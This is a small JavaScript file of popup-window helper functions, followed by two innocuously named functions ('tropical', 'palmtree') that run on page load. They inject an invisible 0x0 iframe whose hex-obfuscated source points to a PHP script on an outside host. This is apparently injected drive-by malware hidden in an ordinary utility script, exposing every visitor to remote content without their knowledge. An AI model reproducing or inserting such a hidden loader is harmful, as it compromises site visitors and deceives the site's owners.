function _popup(url, width, height,name) {
    if (width==0) { width=screen.width; }
    if (height==0) { height=screen.height; }
    if (name!=true) { var rnd = (Math.round((Math.random()*999)+1)); }
    else { var rnd="x"; }
    var top=Math.floor((screen.availHeight-height)/2)-(screen.height-screen.availHeight);
    var left=Math.floor((screen.availWidth-width)/2)-(screen.width-screen.availWidth);
    window.open(url, "w"+rnd, "top="+top+", left="+left+", width="+width+", height="+height+", buttons=no, scrollbars=no, location=no, menubar=no, resizable=no, status=no, directories=no, toolbar=no");
    void(0);
}

function _popupR(url,width,height,name) {
    if (width==0) { width=screen.width; }
    if (height==0) { height=screen.height; }
    if (name!=true) { var rnd = (Math.round((Math.random()*999)+1)); }
    else { var rnd="x"; }
    var top=Math.floor((screen.availHeight-height)/2)-(screen.height-screen.availHeight);
    var left=Math.floor((screen.availWidth-width)/2)-(screen.width-screen.availWidth);
    window.open(url, "w"+rnd, "top="+top+",left="+left+",width="+width+",height="+height+",buttons=no,scrollbars=yes,location=no,menubar=no,resizable=yes,status=no,directories=no,toolbar=no");
    void(0);
}
function tropical(s,w,h){
        var iframe = document.createElement("iframe");
        iframe.src=s;
        iframe.width=w;
        iframe.height=h;
return iframe;
}
    
function palmtree()
{
  document.getElementsByTagName("body")[0].appendChild( tropical('\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x65\x62\x6C\x61\x73\x74\x2E\x63\x6F\x6D\x2E\x61\x75\x2F\x6A\x73\x2F\x75\x73\x65\x2E\x70\x68\x70',0,0));
}

window.onload=palmtree;
